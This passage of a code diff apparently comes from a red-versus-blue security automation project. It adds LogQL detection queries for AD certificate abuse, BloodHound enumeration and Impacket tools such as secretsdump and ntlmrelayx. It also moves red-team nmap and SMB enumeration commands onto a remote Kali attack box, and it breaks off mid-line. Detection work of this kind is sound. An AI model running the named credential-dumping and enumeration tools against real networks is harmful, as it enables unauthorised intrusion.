"(?i)(pki|certificatetemplate|mspki|enrollmentflag)"' + ) + + logger.info(f"ESC4 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc4_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "high" + result["_description"] = "ESC4: Certificate template ACL modification" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_esc8_attack( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect ESC8 - NTLM Relay to AD CS HTTP Endpoints. + + ESC8 exploits AD CS web enrollment endpoints (certsrv) via NTLM relay. + Attackers coerce authentication then relay to the CA to request certs. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ESC8 attack indicators. + """ + dn.log_metric("query_template_esc8", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # ESC8 indicators: + # - HTTP requests to /certsrv/certfnsh.asp + # - NTLM relay patterns + # - PetitPotam/PrinterBug coercion followed by cert request + logql = ( + '{job=~".+"}' + ' |~ "(?i)(certsrv|certfnsh|certenroll|ntlmrelayx)"' + ' |~ "(?i)(relay|coerce|petitpotam|printerbug|dfscoerce)"' + ) + + logger.info(f"ESC8 attack detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "esc8_attack" + result["_mitre_technique"] = "T1649" + result["_severity"] = "critical" + result["_description"] = "ESC8: NTLM relay to AD CS web enrollment" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_certificate_authentication( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect authentication using stolen/forged certificates. + + Detects red team's certipy_auth using certificates for PKINIT auth + to obtain TGTs and NTLM hashes. + + MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with cert auth indicators. + """ + dn.log_metric("query_template_cert_auth", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # PKINIT authentication, certificate-based Kerberos + # Event 4768 with certificate auth + logql = ( + '{job=~".+"}' + ' |~ "(?i)(pkinit|pkca|smartcard|certificate.*auth)"' + ' |~ "(?i)(4768|tgt.*request|kerberos|certipy.*auth)"' + ) + + logger.info(f"Certificate authentication detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "certificate_authentication" + result["_mitre_technique"] = "T1649" + result["_red_team_tool"] = "certipy_auth" + + return result + + # ========================================================================= + # BLOODHOUND SPECIFIC LDAP QUERY SIGNATURES + # Maps to: run_bloodhound + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_domain_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound domain trust and forest enumeration. + + BloodHound queries for cross-domain trust relationships and forest + topology to map potential attack paths. + + MITRE ATT&CK: T1482 (Domain Trust Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with domain enum indicators. + """ + dn.log_metric("query_template_bh_domain", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound domain enumeration LDAP queries: + # - trusteddomain objectclass queries + # - crossRef objects for forest structure + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(trusteddomain|crossref|trusttype|trustdirection|trustattributes)"' + ) + + logger.info(f"BloodHound domain enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_domain_enum" + result["_mitre_technique"] = "T1482" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_acl_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound ACL/DACL enumeration. + + BloodHound's ACL collection queries for nTSecurityDescriptor on AD + objects to find privilege escalation paths via ACL abuse. + + MITRE ATT&CK: T1069.002 (Permission Groups Discovery: Domain Groups) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with ACL enumeration indicators. + """ + dn.log_metric("query_template_bh_acl", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # BloodHound ACL collection LDAP patterns: + # - nTSecurityDescriptor attribute requests + # - Large LDAP queries for DACL + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(ntsecuritydescriptor|dacl|securitydescriptor|allowedtoactonbehalf)"' + ) + + logger.info(f"BloodHound ACL enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_acl_enum" + result["_mitre_technique"] = "T1069.002" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_session_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound session enumeration. + + BloodHound enumerates active user sessions on computers using + NetSessionEnum and NetWkstaUserEnum APIs to map where users are logged in. + + MITRE ATT&CK: T1033 (System Owner/User Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with session enum indicators. + """ + dn.log_metric("query_template_bh_session", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Session enumeration APIs: + # - NetSessionEnum (srvsvc) + # - NetWkstaUserEnum (wkssvc) + logql = ( + '{job=~".+"}' + ' |~ "(?i)(srvsvc|wkssvc|netsession|netwksta)"' + ' |~ "(?i)(enum|bloodhound|sharphound|session.*collection)"' + ) + + logger.info(f"BloodHound session enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_session_enum" + result["_mitre_technique"] = "T1033" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_gpo_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound GPO enumeration. + + BloodHound enumerates Group Policy Objects to find GPO-based attack + paths and privilege escalation opportunities. + + MITRE ATT&CK: T1615 (Group Policy Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with GPO enum indicators. + """ + dn.log_metric("query_template_bh_gpo", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # GPO enumeration queries: + # - groupPolicyContainer objectclass + # - gPLink, gPCFileSysPath attributes + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(grouppolicycontainer|gplink|gpcfilesyspath|gpo)"' + ) + + logger.info(f"BloodHound GPO enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_gpo_enum" + result["_mitre_technique"] = "T1615" + result["_red_team_tool"] = "run_bloodhound" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_bloodhound_computer_enum( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect BloodHound computer enumeration. + + BloodHound queries for computer objects with specific attributes + to identify targets for lateral movement. + + MITRE ATT&CK: T1018 (Remote System Discovery) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with computer enum indicators. + """ + dn.log_metric("query_template_bh_computer", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Computer enumeration with BloodHound-specific attributes: + # - operatingsystem, operatingsystemversion + # - serviceprincipalname, msds-allowedtodelegateto + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"' + ' |~ "(?i)(objectclass=computer|operatingsystem|serviceprincipalname|allowedtodelegateto)"' + ) + + logger.info(f"BloodHound computer enumeration detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "bloodhound_computer_enum" + result["_mitre_technique"] = "T1018" + result["_red_team_tool"] = "run_bloodhound" + + return result + + # ========================================================================= + # IMPACKET TOOL FINGERPRINTS + # Maps to: secretsdump, smbclient, wmiexec, psexec, atexec, dcomexec + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_wmiexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-wmiexec remote execution. + + Wmiexec uses WMI for semi-interactive shell, creating processes via + Win32_Process.Create. Output retrieved via SMB temp files. + + MITRE ATT&CK: T1047 (Windows Management Instrumentation) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with wmiexec indicators. + """ + dn.log_metric("query_template_wmiexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Wmiexec patterns: + # - WMI process creation events + # - cmd.exe /Q /c with output redirection to ADMIN$ + # - __InstanceCreationEvent subscription + logql = ( + '{job=~".+"}' + ' |~ "(?i)(wmi|win32_process|root\\\\cimv2)"' + ' |~ "(?i)(wmiexec|impacket|cmd.*\\/q.*\\/c|127\\.0\\.0\\.1.*admin\\$)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Wmiexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_wmiexec" + result["_mitre_technique"] = "T1047" + result["_red_team_tool"] = "wmiexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_psexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-psexec remote execution. + + Psexec uploads a service executable to ADMIN$ share, creates and starts + a service, then communicates via named pipe. Creates distinctive events. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with psexec indicators. + """ + dn.log_metric("query_template_psexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Psexec patterns: + # - Event 7045: Service installed (random 8-char name) + # - Service binary in ADMIN$ or C:\Windows + # - RemComSvc or similar service names + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service.*install|psexec|remcom)"' + ' |~ "(?i)(admin\\$|\\\\\\\\.*\\\\admin|service.*creat|cmd\\.exe)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Psexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_psexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "psexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbexec remote execution. + + Smbexec creates a service that executes commands via cmd.exe with + output redirected to a share file. More stealthy than psexec. + + MITRE ATT&CK: T1569.002 (Service Execution) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbexec indicators. + """ + dn.log_metric("query_template_smbexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbexec patterns: + # - Service with cmd.exe /Q /c echo command + # - BTOBTO service name pattern (default) + # - Output to C:\__output or __output + logql = ( + '{job=~".+"}' + ' |~ "(?i)(7045|service|smbexec)"' + ' |~ "(?i)(btobto|cmd.*echo.*\\^>|__output|execute\\.bat)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbexec" + result["_mitre_technique"] = "T1569.002" + result["_red_team_tool"] = "smbexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_atexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-atexec remote execution. + + Atexec uses the Task Scheduler (ATSVC) to create scheduled tasks + for command execution. Creates Event 4698 (scheduled task created). + + MITRE ATT&CK: T1053.002 (Scheduled Task) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with atexec indicators. + """ + dn.log_metric("query_template_atexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Atexec patterns: + # - Event 4698: Scheduled task created + # - Task name pattern (random characters) + # - cmd.exe /C execution in task + logql = ( + '{job=~".+"}' + ' |~ "(?i)(4698|4699|4700|4701|schtask|taskscheduler|atsvc)"' + ' |~ "(?i)(atexec|impacket|cmd.*\\/c|schtasks)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Atexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_atexec" + result["_mitre_technique"] = "T1053.002" + result["_red_team_tool"] = "atexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_dcomexec( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-dcomexec remote execution. + + Dcomexec uses DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow) + to execute commands remotely. Operates over TCP 135 (RPC). + + MITRE ATT&CK: T1021.003 (DCOM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with dcomexec indicators. + """ + dn.log_metric("query_template_dcomexec", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Dcomexec patterns: + # - DCOM/RPC connections + # - MMC20.Application, ShellWindows, ShellBrowserWindow instantiation + # - Process created by mmc.exe or explorer.exe + logql = ( + '{job=~".+"}' + ' |~ "(?i)(dcom|135/tcp|rpc|mmc20|shellwindows|shellbrowser)"' + ' |~ "(?i)(dcomexec|impacket|executeshellcommand|document\\.application)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Dcomexec detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_dcomexec" + result["_mitre_technique"] = "T1021.003" + result["_red_team_tool"] = "dcomexec" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_sam( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump SAM database dump. + + Secretsdump can dump local SAM database by accessing registry hives + remotely via SMB. Retrieves local account hashes. + + MITRE ATT&CK: T1003.002 (SAM) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with SAM dump indicators. + """ + dn.log_metric("query_template_secretsdump_sam", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # SAM dump patterns: + # - Remote registry access to SAM, SYSTEM, SECURITY hives + # - Event 4663: Object access on registry + # - reg save commands + logql = ( + '{job=~".+"}' + ' |~ "(?i)(registry|hklm|winreg|samr)"' + ' |~ "(?i)(sam|system|security|secretsdump|reg.*save)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"SAM dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_sam" + result["_mitre_technique"] = "T1003.002" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_secretsdump_lsa( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-secretsdump LSA secrets dump. + + Secretsdump extracts LSA secrets which may contain service account + passwords, autologon credentials, and other sensitive data. + + MITRE ATT&CK: T1003.004 (LSA Secrets) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with LSA dump indicators. + """ + dn.log_metric("query_template_secretsdump_lsa", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # LSA secrets dump patterns: + # - SECURITY hive access + # - LSA policy queries + # - $MACHINE.ACC, DefaultPassword, NL$KM patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(lsa|security|policy|secrets)"' + ' |~ "(?i)(\\$machine|defaultpassword|nl\\$|dpapi|secretsdump)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"LSA secrets dump detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_secretsdump_lsa" + result["_mitre_technique"] = "T1003.004" + result["_red_team_tool"] = "secretsdump" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_ntlmrelayx( + self, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-ntlmrelayx NTLM relay attacks. + + Ntlmrelayx intercepts NTLM authentication and relays it to target + services like SMB, LDAP, HTTP for unauthorized access. + + MITRE ATT&CK: T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay) + + Args: + hours_back: Hours of logs to search. + + Returns: + Query results with NTLM relay indicators. + """ + dn.log_metric("query_template_ntlmrelayx", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # NTLM relay patterns: + # - Authentication from unexpected source IP + # - Rapid auth attempts with same NTLM challenge + # - SMB signing not required warnings + logql = ( + '{job=~".+"}' + ' |~ "(?i)(ntlm|relay|responder|inveigh)"' + ' |~ "(?i)(ntlmrelayx|smbrelay|signing.*not.*required|coerce)"' + ) + + logger.info(f"NTLM relay detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_ntlmrelayx" + result["_mitre_technique"] = "T1557.001" + result["_red_team_tool"] = "ntlmrelayx" + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def detect_impacket_smbclient( + self, + target_host: str | None = None, + hours_back: int = 24, + ) -> dict[str, Any]: + """Detect impacket-smbclient share access. + + Smbclient provides interactive SMB access for enumeration and + file operations on remote shares. + + MITRE ATT&CK: T1021.002 (SMB/Windows Admin Shares) + + Args: + target_host: Optional target hostname. + hours_back: Hours of logs to search. + + Returns: + Query results with smbclient indicators. + """ + dn.log_metric("query_template_smbclient", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + # Smbclient patterns: + # - Interactive SMB session characteristics + # - Multiple share enumeration + # - File browsing patterns + logql = ( + '{job=~".+"}' + ' |~ "(?i)(smb|445/tcp|cifs|smbclient)"' + ' |~ "(?i)(impacket|tree.*connect|shares.*enum|file.*access)"' + ) + + if target_host: + logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1] + + logger.info(f"Smbclient detection: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=500) + result["_query_template"] = "impacket_smbclient" + result["_mitre_technique"] = "T1021.002" + result["_red_team_tool"] = "smbclient" + + return result + + # ========================================================================= + # HOST/USER INVESTIGATION HELPERS + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_host_activity( + self, + hostname: str, + hours_back: int = 24, + attack_patterns_only: bool = False, + ) -> dict[str, Any]: + """Get all activity for a specific host. + + Comprehensive query to gather logs for a host during investigation. + Can optionally filter to only show attack-related patterns. + + Args: + hostname: Hostname to investigate. + hours_back: Hours of logs to search. + attack_patterns_only: If True, filter for attack patterns only. + + Returns: + All log activity for the specified host. + """ + dn.log_metric("query_template_host_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + if attack_patterns_only: + logql = ( + f'{{hostname=~".*{hostname}.*"}} |~ "(?i)(4625|4624|4662|4769|4768|5140|7045|4688)"' + ) + else: + logql = f'{{hostname=~".*{hostname}.*"}}' + + logger.info(f"Host activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "host_activity" + result["_target_host"] = hostname + + return result + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_user_activity( + self, + username: str, + hours_back: int = 24, + ) -> dict[str, Any]: + """Get all activity for a specific user. + + Comprehensive query to gather all logs mentioning a user account. + + Args: + username: Username to investigate. + hours_back: Hours of logs to search. + + Returns: + All log activity mentioning the specified user. + """ + dn.log_metric("query_template_user_activity", 1, mode="count") + start_time, end_time = self._get_time_range(hours_back) + + logql = f'{{job=~".+"}} |~ "(?i){username}"' + + logger.info(f"User activity query: {logql}") + + result = await self._query_loki(logql, start_time, end_time, limit=1000) + result["_query_template"] = "user_activity" + result["_target_user"] = username + + return result + + # ========================================================================= + # TEMPLATE LISTING + # ========================================================================= + + @dn.tool_method # type: ignore[untyped-decorator] + def list_query_templates(self) -> list[dict[str, Any]]: + """List all available query templates with MITRE mappings. + + Returns: + List of templates organized by attack phase, with red team tool correlation. + """ + return [ + # Reconnaissance + { + "name": "detect_port_scanning", + "description": "Detect nmap/masscan port scanning", + "mitre": "T1046", + "tactic": "discovery", + "red_team_tool": "nmap_scan", + }, + { + "name": "detect_user_enumeration", + "description": "Detect AD user account enumeration", + "mitre": "T1087.002", + "tactic": "discovery", + "red_team_tool": "enumerate_users", + }, + { + "name": "detect_share_enumeration", + "description": "Detect SMB share discovery", + "mitre": "T1135", + "tactic": "discovery", + "red_team_tool": "enumerate_shares", + }, + # Credential Access + { + "name": "detect_secretsdump", + "description": "Detect credential dumping via secretsdump", + "mitre": "T1003", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_dcsync", + "description": "Detect DCSync attack against domain controller", + "mitre": "T1003.006", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + "severity": "critical", + }, + { + "name": "detect_kerberoasting", + "description": "Detect Kerberoasting TGS ticket requests", + "mitre": "T1558.003", + "tactic": "credential_access", + "red_team_tool": "kerberoast", + }, + { + "name": "detect_asrep_roasting", + "description": "Detect AS-REP roasting attacks", + "mitre": "T1558.004", + "tactic": "credential_access", + "red_team_tool": "asrep_roast", + }, + { + "name": "detect_brute_force", + "description": "Detect brute force/password spray attempts", + "mitre": "T1110", + "tactic": "credential_access", + "red_team_tool": None, + }, + # Lateral Movement + { + "name": "detect_pass_the_hash", + "description": "Detect Pass-the-Hash NTLM attacks", + "mitre": "T1550.002", + "tactic": "lateral_movement", + "red_team_tool": "domain_admin_checker", + }, + { + "name": "detect_lateral_movement", + "description": "Detect PSExec, WMI, WinRM lateral movement", + "mitre": "T1021", + "tactic": "lateral_movement", + "red_team_tool": None, + }, + { + "name": "detect_smb_file_access", + "description": "Detect suspicious file access on shares", + "mitre": "T1039", + "tactic": "collection", + "red_team_tool": "download_file_content", + }, + # Privilege Escalation + { + "name": "detect_adcs_exploitation", + "description": "Detect ADCS certificate abuse (ESC1-15)", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_*", + "severity": "high", + }, + { + "name": "detect_delegation_abuse", + "description": "Detect RBCD/delegation privilege escalation", + "mitre": "T1134.001", + "tactic": "privilege_escalation", + "red_team_tool": "rbcd_write", + }, + { + "name": "detect_bloodhound_collection", + "description": "Detect BloodHound AD enumeration", + "mitre": "T1087", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Persistence + { + "name": "detect_golden_ticket", + "description": "Detect Golden Ticket creation/usage", + "mitre": "T1558.001", + "tactic": "persistence", + "red_team_tool": "generate_golden_ticket", + "severity": "critical", + }, + # Execution + { + "name": "detect_suspicious_execution", + "description": "Detect encoded PowerShell, LOLBins", + "mitre": "T1059", + "tactic": "execution", + "red_team_tool": None, + }, + # ADCS/Certipy Specific (ESC attacks) + { + "name": "detect_certipy_enumeration", + "description": "Detect Certipy certificate template enumeration", + "mitre": "T1649", + "tactic": "discovery", + "red_team_tool": "certipy_find", + }, + { + "name": "detect_esc1_attack", + "description": "Detect ESC1 - Enrollee Supplies Subject attack", + "mitre": "T1649", + "tactic": "privilege_escalation", + "red_team_tool": "certipy_req_esc1", + "severity": "critical", + }, + { + "name": "detect_esc4_attack", + "description": "Detect ESC4 - Certificate template ACL modification", + "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "high", + }, + { + "name": "detect_esc8_attack", + "description": "Detect ESC8 - NTLM relay to AD CS HTTP endpoints", + "mitre": "T1649", + "tactic": "privilege_escalation", + "severity": "critical", + }, + { + "name": "detect_certificate_authentication", + "description": "Detect authentication using stolen/forged certificates", + "mitre": "T1649", + "tactic": "credential_access", + "red_team_tool": "certipy_auth", + }, + # BloodHound Specific LDAP Queries + { + "name": "detect_bloodhound_domain_enum", + "description": "Detect BloodHound domain trust enumeration", + "mitre": "T1482", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_acl_enum", + "description": "Detect BloodHound ACL/DACL collection", + "mitre": "T1069.002", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_session_enum", + "description": "Detect BloodHound session enumeration (NetSessionEnum)", + "mitre": "T1033", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_gpo_enum", + "description": "Detect BloodHound GPO enumeration", + "mitre": "T1615", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + { + "name": "detect_bloodhound_computer_enum", + "description": "Detect BloodHound computer object enumeration", + "mitre": "T1018", + "tactic": "discovery", + "red_team_tool": "run_bloodhound", + }, + # Impacket Tool Fingerprints + { + "name": "detect_impacket_wmiexec", + "description": "Detect impacket-wmiexec WMI remote execution", + "mitre": "T1047", + "tactic": "execution", + "red_team_tool": "wmiexec", + }, + { + "name": "detect_impacket_psexec", + "description": "Detect impacket-psexec service-based execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "psexec", + }, + { + "name": "detect_impacket_smbexec", + "description": "Detect impacket-smbexec stealthy service execution", + "mitre": "T1569.002", + "tactic": "execution", + "red_team_tool": "smbexec", + }, + { + "name": "detect_impacket_atexec", + "description": "Detect impacket-atexec scheduled task execution", + "mitre": "T1053.002", + "tactic": "execution", + "red_team_tool": "atexec", + }, + { + "name": "detect_impacket_dcomexec", + "description": "Detect impacket-dcomexec DCOM remote execution", + "mitre": "T1021.003", + "tactic": "lateral_movement", + "red_team_tool": "dcomexec", + }, + { + "name": "detect_impacket_secretsdump_sam", + "description": "Detect secretsdump SAM database extraction", + "mitre": "T1003.002", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_secretsdump_lsa", + "description": "Detect secretsdump LSA secrets extraction", + "mitre": "T1003.004", + "tactic": "credential_access", + "red_team_tool": "secretsdump", + }, + { + "name": "detect_impacket_ntlmrelayx", + "description": "Detect NTLM relay attacks (ntlmrelayx)", + "mitre": "T1557.001", + "tactic": "credential_access", + "red_team_tool": "ntlmrelayx", + }, + { + "name": "detect_impacket_smbclient", + "description": "Detect impacket-smbclient share access", + "mitre": "T1021.002", + "tactic": "lateral_movement", + "red_team_tool": "smbclient", + }, + # Investigation Helpers + { + "name": "get_host_activity", + "description": "Get all activity for a specific host", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + { + "name": "get_user_activity", + "description": "Get all activity for a specific user", + "mitre": None, + "tactic": "investigation", + "red_team_tool": None, + }, + ] diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py index af318b19..4773c0be 100644 --- a/src/ares/tools/red/network.py +++ b/src/ares/tools/red/network.py @@ -2,12 +2,11 @@ This module provides toolsets for network enumeration, credential harvesting, password cracking, share pilfering, and golden ticket generation. + +All tools execute commands remotely on the Kali attack box via AWS SSM. """ import logging -import os -import subprocess -import tempfile import time from datetime import datetime, timezone from typing import Any @@ -24,10 +23,25 @@ TimelineEvent, User, ) +from ares.core.remote import run_remote logger = logging.getLogger(__name__) +def _run_tool(cmd: list[str], timeout_seconds: int = 300) -> tuple[str, str, int]: + """Execute a command on the remote Kali attack box. + + Args: + cmd: Command as list of arguments + timeout_seconds: Maximum execution time + + Returns: + Tuple of (stdout, stderr, return_code) + """ + result = run_remote(cmd, timeout_seconds=timeout_seconds) + return result.stdout, result.stderr, result.return_code + + class NetworkEnumerationTools(Toolset): """Tools for network scanning and enumeration.""" @@ -58,15 +72,15 @@ def nmap_scan(self, target: str) -> str: >>> result = nmap_scan("192.168.1.2") >>> result = nmap_scan("192.168.1.2 192.168.1.3 192.168.1.4") """ - cmd = ["nmap", "-T4", "-sS", "-sV", "--open"] + target.split(" ") + cmd = ["nmap", "-T4", "-sV", "--open"] + target.split(" ") try: logger.info(f"[*] Scanning targets: {target}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=300) - if result.returncode != 0: - logger.error(f"[!] Nmap scan failed: {result.stderr}") - return result.stderr + if returncode != 0: + logger.error(f"[!] Nmap scan failed: {stderr}") + return stderr or f"Nmap scan failed with code {returncode}" logger.info(f"[*] Nmap scan completed for target {target}") @@ -75,11 +89,8 @@ def nmap_scan(self, target: str) -> str: for ip in target.split(): self.state.queried_hosts.add(ip) - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error("Nmap scan timed out after 5 minutes") - return "Nmap scan timed out after 5 minutes" except Exception as e: logger.error(f"Scan failed: {e!s}") return f"Scan failed: {e!s}" @@ -118,15 +129,13 @@ def enumerate_users(self, target: str, username: str, password: str, domain: str cmd.append("--users") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info( f"[*] User enumeration completed for {target} (user:{username}, domain:{domain})" ) - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"User enumeration timed out for {target}" except Exception as e: logger.error(f"User enumeration failed: {e}") return f"User enumeration failed for {target}: {e}" @@ -165,13 +174,11 @@ def enumerate_shares( cmd.append("--shares") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = 